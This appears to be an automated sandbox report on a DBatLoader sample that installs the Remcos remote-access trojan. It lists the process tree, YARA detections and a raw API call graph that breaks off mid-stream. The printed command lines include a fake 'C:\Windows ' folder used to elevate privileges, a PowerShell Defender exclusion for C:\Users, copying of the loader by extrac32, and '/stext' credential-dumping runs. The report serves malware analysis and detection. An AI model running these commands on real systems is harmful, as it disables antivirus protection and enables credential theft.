Path:C:\Users\user\Desktop\midyear_statement.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\midyear_statement.exe"
Imagebase:0x400000
File size:1'265'664 bytes
MD5 hash:DD8E3F6AC5C24960B3A69490082C60E1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:3
Start time:13:59:04
Start date:28/03/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c mkdir "\\?\C:\Windows "
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:13:59:04
Start date:28/03/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c mkdir "\\?\C:\Windows \System32"
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:13:59:04
Start date:28/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:13:59:04
Start date:28/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:13:59:04
Start date:28/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:14
Start time:13:59:07
Start date:28/03/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c "C:\Windows \System32\2506803.exe"
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:13:59:07
Start date:28/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:13:59:07
Start date:28/03/2024
Path:C:\Windows \System32\2506803.exe
Wow64 process (32bit):false
Commandline:"C:\Windows \System32\2506803.exe"
Imagebase:0x7ff790070000
File size:131'648 bytes
MD5 hash:231CE1E1D7D98B44371FFFF407D68B59
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:17
Start time:13:59:07
Start date:28/03/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Imagebase:0x7ff752700000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                        Imagebase:0x7ff752700000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                        Start time:13:59:07
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                        Start time:13:59:08
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                        Start time:13:59:12
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                        File size:29'184 bytes
                                                                                                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                        Start time:13:59:13
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                        Start time:13:59:15
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                        Imagebase:0x7ff7fb730000
                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                        Start time:13:59:16
                                                                                                                                                                                        Start date:28/03/2024
                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:13:59:16
Start date:28/03/2024
Path:C:\Users\Public\Libraries\wkrriuhD.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:13:59:16
Start date:28/03/2024
Path:C:\Users\Public\Libraries\wkrriuhD.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:15:41:07
Start date:28/03/2024
Path:C:\Users\Public\Libraries\Dhuirrkw.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Dhuirrkw.PIF"
Imagebase:0x400000
File size:1'265'664 bytes
MD5 hash:DD8E3F6AC5C24960B3A69490082C60E1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 26%, ReversingLabs
Has exited:true

Target ID:31
Start time:15:41:15
Start date:28/03/2024
Path:C:\Users\Public\Libraries\wkrriuhD.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wkrriuhD.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:true

Target ID:32
Start time:15:41:15
Start date:28/03/2024
Path:C:\Users\Public\Libraries\Dhuirrkw.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Dhuirrkw.PIF"
Imagebase:0x400000
File size:1'265'664 bytes
MD5 hash:DD8E3F6AC5C24960B3A69490082C60E1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:33
Start time:15:41:22
Start date:28/03/2024
Path:C:\Users\Public\Libraries\wkrriuhD.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\wkrriuhD.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Execution Graph

Execution Coverage:16.4%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:28.2%
Total number of Nodes:1462
Total number of Limit Nodes:19
[Execution graph: node-level call graph rendered by the report viewer; only the API names it references are recoverable here: QueryPerformanceCounter, GetTickCount, InetIsOffline, LocalAlloc, TlsSetValue, TlsGetValue, SysAllocStringLen, SysReAllocStringLen, SysFreeString, VirtualAlloc, VirtualFree, Sleep, timeSetEvent, GetMessageA, TranslateMessage, DispatchMessageA, GetStdHandle, WriteFile, MessageBoxA, FreeLibrary, ExitProcess, GetModuleFileNameA, RegOpenKeyExA]
35422->35415 35425 40a5abf 35424->35425 35426 40a5a7f RegOpenKeyExA 35424->35426 35442 40a5878 12 API calls 35425->35442 35426->35425 35428 40a5a9d RegOpenKeyExA 35426->35428 35428->35425 35430 40a5b48 lstrcpynA GetThreadLocale GetLocaleInfoA 35428->35430 35429 40a5ae4 RegQueryValueExA 35431 40a5b22 RegCloseKey 35429->35431 35432 40a5b04 RegQueryValueExA 35429->35432 35433 40a5b7f 35430->35433 35434 40a5c62 35430->35434 35431->35422 35432->35431 35433->35434 35436 40a5b8f lstrlenA 35433->35436 35434->35422 35437 40a5ba7 35436->35437 35437->35434 35438 40a5bcc lstrcpynA LoadLibraryExA 35437->35438 35439 40a5bf4 35437->35439 35438->35439 35439->35434 35440 40a5bfe lstrcpynA LoadLibraryExA 35439->35440 35440->35434 35441 40a5c30 lstrcpynA LoadLibraryExA 35440->35441 35441->35434 35442->35429 35443 40c5222 35444 40a47d0 11 API calls 35443->35444 35445 40c5243 35444->35445 35446 40a475c 11 API calls 35445->35446 35447 40c527a 35446->35447 36229 40b7b88 35447->36229 35450 40a47d0 11 API calls 35451 40c52bf 35450->35451 35452 40a475c 11 API calls 35451->35452 35453 40c52f6 35452->35453 35454 40b7b88 17 API calls 35453->35454 35455 40c531a 35454->35455 35456 40a47d0 11 API calls 35455->35456 35457 40c533b 35456->35457 35458 40a475c 11 API calls 35457->35458 35459 40c5372 35458->35459 35460 40b7b88 17 API calls 35459->35460 35461 40c5396 35460->35461 35462 40a47d0 11 API calls 35461->35462 35463 40c53b7 35462->35463 35464 40a475c 11 API calls 35463->35464 35465 40c53ee 35464->35465 35466 40b7b88 17 API calls 35465->35466 35467 40c5412 35466->35467 35468 40a47d0 11 API calls 35467->35468 35469 40c5433 35468->35469 35470 40a475c 11 API calls 35469->35470 35471 40c546a 35470->35471 35472 40b7b88 17 API calls 35471->35472 35473 40c548e 35472->35473 35474 40a47d0 11 API calls 35473->35474 35475 40c54c8 35474->35475 36238 40bd598 35475->36238 35478 40a47d0 11 API calls 35479 40c5535 35478->35479 35480 40a475c 11 API calls 35479->35480 35481 40c556c 35480->35481 35482 40b7b88 17 
API calls 35481->35482 35483 40c5590 35482->35483 35484 40a47d0 11 API calls 35483->35484 35485 40c55b1 35484->35485 35486 40a475c 11 API calls 35485->35486 35487 40c55e8 35486->35487 35488 40b7b88 17 API calls 35487->35488 35489 40c560c 35488->35489 35490 40a47d0 11 API calls 35489->35490 35491 40c562d 35490->35491 35492 40a475c 11 API calls 35491->35492 35493 40c5664 35492->35493 35494 40b7b88 17 API calls 35493->35494 35495 40c5688 35494->35495 35496 40a47d0 11 API calls 35495->35496 35497 40c56a9 35496->35497 35498 40a475c 11 API calls 35497->35498 35499 40c56e0 35498->35499 35500 40b7b88 17 API calls 35499->35500 35501 40c5704 35500->35501 35502 40a47d0 11 API calls 35501->35502 35503 40c5725 35502->35503 35504 40a475c 11 API calls 35503->35504 35505 40c575c 35504->35505 35506 40b7b88 17 API calls 35505->35506 35507 40c5780 35506->35507 35508 40a47d0 11 API calls 35507->35508 35509 40c57a1 35508->35509 35510 40a475c 11 API calls 35509->35510 35511 40c57d8 35510->35511 35512 40b7b88 17 API calls 35511->35512 35513 40c57fc 35512->35513 35514 40a47d0 11 API calls 35513->35514 35515 40c581d 35514->35515 35516 40a475c 11 API calls 35515->35516 35517 40c5854 35516->35517 35518 40b7b88 17 API calls 35517->35518 35519 40c5878 35518->35519 35520 40a47d0 11 API calls 35519->35520 35521 40c5899 35520->35521 35522 40a475c 11 API calls 35521->35522 35523 40c58d0 35522->35523 35524 40b7b88 17 API calls 35523->35524 35525 40c58f4 35524->35525 35526 40a47d0 11 API calls 35525->35526 35527 40c5915 35526->35527 35528 40a475c 11 API calls 35527->35528 35529 40c594c 35528->35529 35530 40b7b88 17 API calls 35529->35530 35531 40c5970 35530->35531 35532 40c64b4 35531->35532 35533 40c5985 35531->35533 35535 40a47d0 11 API calls 35532->35535 35534 40a47d0 11 API calls 35533->35534 35536 40c59a6 35534->35536 35537 40c64d5 35535->35537 35538 40a475c 11 API calls 35536->35538 35539 40a475c 11 API calls 35537->35539 35540 40c59dd 35538->35540 35541 40c650c 35539->35541 35542 40b7b88 17 
API calls 35540->35542 35543 40b7b88 17 API calls 35541->35543 35545 40c5a01 35542->35545 35544 40c6530 35543->35544 35547 40a47d0 11 API calls 35544->35547 35546 40a47d0 11 API calls 35545->35546 35548 40c5a22 35546->35548 35549 40c6551 35547->35549 35550 40a475c 11 API calls 35548->35550 35551 40a475c 11 API calls 35549->35551 35552 40c5a59 35550->35552 35553 40c6588 35551->35553 35554 40b7b88 17 API calls 35552->35554 35555 40b7b88 17 API calls 35553->35555 35556 40c5a7d 35554->35556 35557 40c65ac 35555->35557 35558 40a47d0 11 API calls 35556->35558 35559 40a47d0 11 API calls 35557->35559 35560 40c5a9e 35558->35560 35561 40c65cd 35559->35561 35562 40a475c 11 API calls 35560->35562 35563 40a475c 11 API calls 35561->35563 35564 40c5ad5 35562->35564 35565 40c6604 35563->35565 35566 40b7b88 17 API calls 35564->35566 35567 40b7b88 17 API calls 35565->35567 35568 40c5af9 35566->35568 35569 40c6628 35567->35569 35570 40a475c 11 API calls 35568->35570 35571 40a47d0 11 API calls 35569->35571 35572 40c5b11 35570->35572 35575 40c6649 35571->35575 35573 40c5b1c WinExec 35572->35573 35574 40a47d0 11 API calls 35573->35574 35577 40c5b43 35574->35577 35576 40a475c 11 API calls 35575->35576 35579 40c6680 35576->35579 35578 40a475c 11 API calls 35577->35578 35582 40c5b7a 35578->35582 35580 40b7b88 17 API calls 35579->35580 35581 40c66a4 35580->35581 35584 40c72bf 35581->35584 35585 40c66b9 35581->35585 35583 40b7b88 17 API calls 35582->35583 35587 40c5b9e 35583->35587 35586 40a47d0 11 API calls 35584->35586 35588 40a47d0 11 API calls 35585->35588 35593 40c72e0 35586->35593 35589 40a47d0 11 API calls 35587->35589 35590 40c66da 35588->35590 35592 40c5bbf 35589->35592 35591 40c66f2 35590->35591 35594 40a475c 11 API calls 35591->35594 35596 40a475c 11 API calls 35592->35596 35595 40a475c 11 API calls 35593->35595 35597 40c6711 35594->35597 35598 40c7317 35595->35598 35599 40c5bf6 35596->35599 35600 40b7b88 17 API calls 35597->35600 35601 40b7b88 17 API calls 35598->35601 35603 
40b7b88 17 API calls 35599->35603 35604 40c6735 35600->35604 35602 40c733b 35601->35602 35605 40a47d0 11 API calls 35602->35605 35606 40c5c1a 35603->35606 35607 40a47d0 11 API calls 35604->35607 35611 40c735c 35605->35611 35608 40a47d0 11 API calls 35606->35608 35609 40c6756 35607->35609 35612 40c5c3b 35608->35612 35610 40c676e 35609->35610 35613 40a475c 11 API calls 35610->35613 35614 40a475c 11 API calls 35611->35614 35615 40a475c 11 API calls 35612->35615 35616 40c678d 35613->35616 35617 40c7393 35614->35617 35618 40c5c72 35615->35618 35619 40b7b88 17 API calls 35616->35619 35620 40b7b88 17 API calls 35617->35620 35621 40b7b88 17 API calls 35618->35621 35622 40c67b1 35619->35622 35623 40c73b7 35620->35623 35627 40c5c96 35621->35627 35624 40a47d0 11 API calls 35622->35624 35625 40a47d0 11 API calls 35623->35625 35626 40c67d2 35624->35626 35628 40c73d8 35625->35628 35629 40c67ea 35626->35629 36657 40b9e10 29 API calls 35627->36657 35632 40a475c 11 API calls 35628->35632 35631 40a475c 11 API calls 35629->35631 35635 40c6809 35631->35635 35636 40c740f 35632->35636 35633 40c5cbd 35634 40a47d0 11 API calls 35633->35634 35637 40c5cde 35634->35637 35638 40b7b88 17 API calls 35635->35638 35639 40b7b88 17 API calls 35636->35639 35640 40a475c 11 API calls 35637->35640 35641 40c682d 35638->35641 35648 40c7433 35639->35648 35646 40c5d15 35640->35646 35642 40a475c 11 API calls 35641->35642 35643 40c6859 35642->35643 35647 40c6871 35643->35647 35644 40c7c13 35645 40a47d0 11 API calls 35644->35645 35652 